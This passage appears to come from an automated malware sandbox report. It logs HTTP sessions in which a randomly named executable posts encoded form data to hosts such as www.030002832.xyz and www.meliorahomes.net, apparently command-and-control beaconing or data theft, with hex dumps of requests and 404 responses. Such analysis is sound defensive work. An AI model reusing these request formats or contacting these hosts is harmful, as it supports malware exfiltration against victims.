                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.030002832.xyz
                                                          Referer: http://www.030002832.xyz/l9k5/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4b 35 30 77 6c 35 42 50 64 35 4b 36 50 67 38 49 59 68 53 42 31 73 6e 70 2b 53 56 4e 34 41 6b 48 67 2f 7a 51 54 6b 6d 55 62 75 59 4b 4f 77 4e 55 36 6a 42 78 34 68 4a 4f 79 61 4f 38 62 43 67 4b 49 4b 62 48 74 68 47 72 70 32 6b 31 6c 42 56 56 4b 49 4c 2f 37 45 38 33 64 42 6b 39 70 4a 4b 67 57 6c 77 64 6a 69 2f 62 2b 67 42 66 59 54 55 42 61 5a 32 6f 74 6e 2f 4e 6d 6a 48 78 2b 4c 73 72 6c 64 59 2b 36 7a 53 55 56 39 38 67 4b 63 33 48 43 36 6a 59 6e 41 67 6e 36 54 67 50 72 48 71 64 78 6c 57 4a 42 67 54 41 65 54 6d 42 2f 33 4a 4b 67 35 73 6b 55 46 43 59 6a 31 6c 36 51 4f 71 4b 7a 6f 44 31 70 4e 58 2b 43 56 45 51 66 56 4a 63 55 65 4c 62 42 6e 6f 3d
                                                          Data Ascii: H0kxIVc=K50wl5BPd5K6Pg8IYhSB1snp+SVN4AkHg/zQTkmUbuYKOwNU6jBx4hJOyaO8bCgKIKbHthGrp2k1lBVVKIL/7E83dBk9pJKgWlwdji/b+gBfYTUBaZ2otn/NmjHx+LsrldY+6zSUV98gKc3HC6jYnAgn6TgPrHqdxlWJBgTAeTmB/3JKg5skUFCYj1l6QOqKzoD1pNX+CVEQfVJcUeLbBno=
                                                          Nov 5, 2024 15:43:53.720088005 CET1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:43:53 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: W/"66cce1df-b96"
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                          Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                          Nov 5, 2024 15:43:53.720257998 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.450022161.97.142.144802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:55.427784920 CET10820OUTPOST /l9k5/ HTTP/1.1
                                                          Host: www.030002832.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.030002832.xyz
                                                          Referer: http://www.030002832.xyz/l9k5/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4b 35 30 77 6c 35 42 50 64 35 4b 36 50 67 38 49 59 68 53 42 31 73 6e 70 2b 53 56 4e 34 41 6b 48 67 2f 7a 51 54 6b 6d 55 62 74 34 4b 4e 47 52 55 34 43 42 78 35 68 4a 4f 78 61 4f 35 62 43 67 58 49 4b 54 62 74 68 37 63 70 30 63 31 6c 6a 74 56 49 35 4c 2f 68 55 38 33 41 78 6b 38 78 70 4b 50 57 68 55 5a 6a 69 50 62 2b 67 42 66 59 56 77 42 63 4e 43 6f 68 48 2f 4f 32 7a 48 39 6f 37 73 51 6c 64 42 47 36 7a 6d 75 56 4a 41 67 4b 38 6e 48 45 59 62 59 36 77 67 6c 35 54 67 58 72 48 6d 53 78 6c 61 46 42 68 6e 6d 65 52 36 42 73 42 6b 30 33 4a 77 59 43 33 4b 6d 32 45 35 6c 58 66 32 4c 79 76 4c 56 6e 2f 4c 31 53 55 68 35 66 53 35 54 48 4e 47 59 55 6e 64 53 75 4d 4c 65 32 47 35 2b 4c 67 61 39 45 32 43 62 66 63 33 66 72 4f 57 4e 31 36 74 4e 79 72 53 49 4a 66 7a 44 46 2b 4d 77 48 42 50 34 35 6f 37 58 43 6f 33 64 78 35 79 42 35 38 62 4c 6c 55 6e 2f 65 73 53 37 74 77 30 6a 69 30 58 38 53 50 55 39 6e 41 6c 31 52 6a 38 54 32 62 52 73 4a 48 6f 42 7a 57 70 75 7a 6e 4a 65 33 36 7a 42 52 75 6f 34 55 36 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=K50wl5BPd5K6Pg8IYhSB1snp+SVN4AkHg/zQTkmUbt4KNGRU4CBx5hJOxaO5bCgXIKTbth7cp0c1ljtVI5L/hU83Axk8xpKPWhUZjiPb+gBfYVwBcNCohH/O2zH9o7sQldBG6zmuVJAgK8nHEYbY6wgl5TgXrHmSxlaFBhnmeR6BsBk03JwYC3Km2E5lXf2LyvLVn/L1SUh5fS5THNGYUndSuMLe2G5+Lga9E2Cbfc3frOWN16tNyrSIJfzDF+MwHBP45o7XCo3dx5yB58bLlUn/esS7tw0ji0X8SPU9nAl1Rj8T2bRsJHoBzWpuznJe36zBRuo4U6PGnznH6mwI4AYNt+tdGtXf6DZJsfqARoPy/xjQbzvkS6SRTHOOP6x7ZqeViQzrI7Kye2tSERDprd3rsOTGOWG1OjYOoPQ/0SqlcAF6pt92NHOsIJHSpeNuwyDpZaIX1PdOE9Tm1QHvQm/ZpxoiN0JuB+dc+JA+RpV8dsB2V2S5FUUTR7ezDVU9eoOCb28xJ7beaQ/1Crqz7D5fw7LXgLPKbVRCWP0S95hVLLNy+VEwvTBH6wIHFCf12vNt6j9Oq9ep5h82SsrT7AlgNv3XNoSGFcMRQKtPUpcJohUsZAKqv0Y3lVC68CAl57uNPC5FocyNzTdhEgCNQsAo9iKvEo4xZp4Ldfs0bA30QPcrqB/jB2bju1B6EBt+Co6ptBDB9xZoBT09Z1LlkdMby7YVQfMFRBTZCbLA3M4ryYOFucskgzzNPYVm53ELCryhtCSQ7MVszFsqCPb3IkzoKTlFRR+ubN48Zg2sKCdk2u5WEukRujCpbcxzTc0qqIY7Pg2CXB6Tsi+oF7Un2O0KHXnvLjIzW8fJn3TlaHGjIaeZ+NuJkzrvqtSYHRPftoUSWA3sUGl4qC9rCvTOP9Vf8p0wZkdjbyqygMNRZxpvOimSTrFEXUF/dDDm+MZFinxg/LUg6KQZ3vzsiAhYhUgZbKDAW5e3L5Fe69tFBBLU [TRUNCATED]
                                                          Nov 5, 2024 15:43:56.255413055 CET1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:43:56 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: W/"66cce1df-b96"
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                          Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                          Nov 5, 2024 15:43:56.255562067 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.450023161.97.142.144802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:57.965922117 CET448OUTGET /l9k5/?H0kxIVc=H7cQmPt9JKqTBSlTYALj3uL313cqwSgrpOv4Qk+KWtYmd0Jzyglo5RxLzde7ABUUHrDY6BWuihw46hFGdejdjXkFASgi7f2oXUpHkyzL6FMNfiZrHYO4gE8=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.030002832.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:43:58.817068100 CET1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:43:58 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 2966
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: "66cce1df-b96"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                          Nov 5, 2024 15:43:58.817099094 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                          Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                          Nov 5, 2024 15:43:58.817107916 CET424INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                          Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                          Nov 5, 2024 15:43:58.817148924 CET274INData Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f
                                                          Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.4500248.217.17.192802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:03.992121935 CET727OUTPOST /y4rz/ HTTP/1.1
                                                          Host: www.meliorahomes.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.meliorahomes.net
                                                          Referer: http://www.meliorahomes.net/y4rz/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 38 70 4b 77 31 54 68 54 32 68 32 52 61 72 43 47 4f 38 65 4a 46 43 46 7a 32 6b 69 56 75 72 68 64 69 4e 76 5a 74 56 4a 62 4b 50 71 48 61 46 68 41 6a 37 34 65 35 4f 77 55 39 6e 68 39 71 7a 41 49 43 58 63 75 64 73 57 4f 35 46 76 35 35 6b 6f 30 53 2f 30 53 7a 52 65 6e 59 54 50 58 69 6c 43 74 45 4c 62 50 43 4d 49 74 57 2b 4e 6c 4c 71 7a 32 75 47 6e 6d 66 36 47 38 77 31 45 65 6d 36 51 33 4c 44 64 4f 35 64 6e 50 43 50 54 37 4a 64 52 75 61 6d 5a 36 59 76 62 58 63 45 63 32 6d 59 37 36 5a 37 6e 30 2f 78 79 4b 6f 43 41 59 37 79 68 43 4e 2b 54 38 6b 76 72 56 44 38 59 49 4a 57 5a 2b 4e 51 3d 3d
                                                          Data Ascii: H0kxIVc=8pKw1ThT2h2RarCGO8eJFCFz2kiVurhdiNvZtVJbKPqHaFhAj74e5OwU9nh9qzAICXcudsWO5Fv55ko0S/0SzRenYTPXilCtELbPCMItW+NlLqz2uGnmf6G8w1Eem6Q3LDdO5dnPCPT7JdRuamZ6YvbXcEc2mY76Z7n0/xyKoCAY7yhCN+T8kvrVD8YIJWZ+NQ==
                                                          Nov 5, 2024 15:44:04.961210012 CET393INHTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:04 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.4500258.217.17.192802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:06.791482925 CET747OUTPOST /y4rz/ HTTP/1.1
                                                          Host: www.meliorahomes.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.meliorahomes.net
                                                          Referer: http://www.meliorahomes.net/y4rz/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 38 70 4b 77 31 54 68 54 32 68 32 52 59 4c 79 47 64 76 32 4a 45 69 46 77 7a 6b 69 56 67 4c 68 42 69 4e 54 5a 74 51 35 4c 4c 38 65 48 61 67 64 41 69 35 41 65 36 4f 77 55 31 48 68 34 6e 54 41 35 43 58 51 51 64 70 75 4f 35 46 72 35 35 6c 59 30 53 4d 4d 52 68 78 65 68 42 6a 50 56 73 46 43 74 45 4c 62 50 43 49 59 44 57 2b 6c 6c 4c 62 44 32 75 6b 66 68 5a 4b 47 37 67 6c 45 65 69 36 52 66 4c 44 64 34 35 63 37 70 43 4a 66 37 4a 66 4a 75 61 33 5a 35 44 66 62 52 59 45 64 34 76 37 69 71 66 5a 32 56 33 32 61 49 33 41 34 33 7a 55 77 59 63 50 79 72 32 76 50 6d 65 37 52 38 45 56 6b 33 57 64 4e 42 74 58 45 41 74 67 4a 4c 77 66 34 45 71 39 57 36 52 79 63 3d
                                                          Data Ascii: H0kxIVc=8pKw1ThT2h2RYLyGdv2JEiFwzkiVgLhBiNTZtQ5LL8eHagdAi5Ae6OwU1Hh4nTA5CXQQdpuO5Fr55lY0SMMRhxehBjPVsFCtELbPCIYDW+llLbD2ukfhZKG7glEei6RfLDd45c7pCJf7JfJua3Z5DfbRYEd4v7iqfZ2V32aI3A43zUwYcPyr2vPme7R8EVk3WdNBtXEAtgJLwf4Eq9W6Ryc=
                                                          Nov 5, 2024 15:44:07.782651901 CET393INHTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:07 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.4500268.217.17.192802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:09.332849979 CET10829OUTPOST /y4rz/ HTTP/1.1
                                                          Host: www.meliorahomes.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.meliorahomes.net
                                                          Referer: http://www.meliorahomes.net/y4rz/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 38 70 4b 77 31 54 68 54 32 68 32 52 59 4c 79 47 64 76 32 4a 45 69 46 77 7a 6b 69 56 67 4c 68 42 69 4e 54 5a 74 51 35 4c 4c 39 6d 48 61 79 6c 41 6a 59 41 65 37 4f 77 55 37 6e 68 35 6e 54 41 6b 43 58 4a 58 64 70 71 42 35 47 66 35 2f 33 51 30 46 74 4d 52 72 78 65 68 4a 44 50 49 69 6c 43 34 45 4c 71 47 43 4d 38 44 57 2b 6c 6c 4c 59 62 32 70 32 6e 68 62 4b 47 38 77 31 45 53 6d 36 52 6b 4c 44 46 47 35 66 58 66 43 5a 2f 37 49 2f 5a 75 59 42 74 35 65 76 62 54 56 6b 63 6c 76 37 66 77 66 5a 36 2f 33 7a 6d 6d 33 44 6b 33 33 6c 46 33 48 63 36 45 71 5a 44 38 50 4c 78 74 44 43 49 7a 58 76 6c 42 38 31 51 55 74 79 5a 65 72 50 52 59 77 50 57 46 43 69 6e 76 38 78 6a 52 4a 67 4b 58 6c 6a 37 4f 65 6b 4f 68 64 64 72 71 62 76 67 65 6e 59 66 51 7a 31 49 34 65 30 74 2f 77 2f 39 2b 70 68 50 2f 33 70 44 4b 46 70 46 4c 73 70 6b 51 7a 4a 79 4e 48 6a 4c 6f 64 74 79 38 76 49 2b 46 69 31 72 44 45 37 50 73 63 2b 68 64 79 6c 77 36 63 30 66 49 64 48 43 5a 61 48 33 4d 4a 78 63 71 32 4c 50 